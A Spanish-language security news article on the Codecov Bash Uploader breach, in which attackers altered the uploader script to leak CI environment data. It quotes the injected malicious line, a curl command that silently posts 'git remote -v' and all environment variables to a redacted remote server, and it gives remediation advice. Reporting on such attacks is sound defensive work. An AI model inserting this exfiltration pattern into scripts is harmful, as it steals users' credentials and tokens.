La empresa de testing de software Codecov detectó un acceso no autorizado y una modificación en su herramienta Bash Uploader el pasado 1 de abril.
El «testing de software» a través de flujos de trabajo con integración continua (CI) y despliegue continuo (CD) es una práctica cada vez más habitual en el desarrollo de software. El uso de estas herramientas garantizan un mayor nivel de calidad en el código. Codecov, una plataforma de «testing de software», anunció recientemente que ha sufrido una brecha de seguridad que afectaría a sus usuarios. Entre sus más de 29.000 clientes destacan nombres como Atlassian, P&G o GoDaddy. Según el comunicado de la compañía, esta brecha estaría activa desde enero.
Nuestra investigación ha determinado que desde el 31 de enero ha habido alteraciones no autorizadas de Bash Uploader por una tercera persona. Como resultado, se pudo exportar información almacenada en los entornos de CI de nuestros usuarios. Dicha información fue enviada a un servidor ajeno a la infraestructura de Codecov.
Jerrod Engelberg, CEO de Codecov, sobre la intrusión.
En primer lugar los atacantes habrían aprovechado un bug en el proceso de creación de imagen de Docker de la compañía. Como resultado obtuvieron acceso a las credenciales necesarias para modificar Bash Uploader y enviar el contenido de las variables de entorno a un servidor remoto. La alteración del script incluía el siguiente código.
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://<redacted>/upload/v2 || trueA modo de resumen, esta versión alterada de Bash Uploader podría filtrar la siguiente información:
- Credenciales, tokens o claves que los clientes estuvieran enviando al entorno de CI.
- Cualquier servicio, almacén de datos y código accesible mediante las credenciales mencionadas.
- La dirección remota de repositorios Git que utilizan Bash Uploader para subir la cobertura de código a Codecov.
Previamente en una-al-dia nos hemos hecho eco de otros tipos de ataques orientados a desarrolladores y proyectos así como ataques en la cadena de suministro de software.
Codecov corrigió el fallo al poco tiempo de tener constancia. En su nota no se menciona el número de clientes afectados; aunque sí afirman haberse puesto en contacto con ellos. Para terminar, se recomienda regenerar las credenciales potencialmente afectadas para mitigar el impacto de esta filtración. También se sugiere revisar el código de Bash Uploader y actualizar la herramienta si se detecta el fragmento de código malicioso. Con todo esto, el impacto de este ataque no afectaría a usuarios que ejecuten su propia instancia de Codecov.
Más información:
Federal investigators looking into breach at software code testing company Codecov
Deja una respuesta